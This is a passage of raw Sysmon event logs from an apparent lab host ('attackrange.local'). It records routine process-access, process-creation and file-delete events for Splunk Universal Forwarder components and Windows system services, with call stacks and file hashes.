Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245695Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.894{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-51A8-6063-B022-00000000AF01}3748C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245694Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.894{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245693Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.894{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245692Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.894{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245691Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.894{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245690Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.894{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245689Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.894{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245688Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.894{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245687Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.894{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245686Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.894{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245685Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.894{CB4067E1-304A-6062-0500-00000000AF01}392508C:\Windows\system32\csrss.exe{CB4067E1-51A8-6063-B022-00000000AF01}3748C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245684Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.894{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-51A8-6063-B022-00000000AF01}3748C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245683Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.894{CB4067E1-51A8-6063-B022-00000000AF01}3748C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245682Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.613{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BB9B0F9F9726B83A22D6984EA76D6A02,SHA256=68B695F23BEBC4242ABEA51652C034EB127C43BF2B4AF7628FCFF4B369368E5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245681Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.488{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29199ED543FC20820C62178FC4BF6295,SHA256=BF421D450828DD16CB2742EAA4ED03876359BE80B86D91830976179941FFCA3F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000245680Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.331{CB4067E1-51A8-6063-AF22-00000000AF01}37522344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245679Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.222{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-51A8-6063-AF22-00000000AF01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245678Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.222{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245677Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.222{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245676Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.222{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245675Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.222{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245674Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.222{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245673Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.222{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245672Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.222{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245671Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.222{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245670Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.222{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245669Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.222{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-51A8-6063-AF22-00000000AF01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245668Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.222{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-51A8-6063-AF22-00000000AF01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program 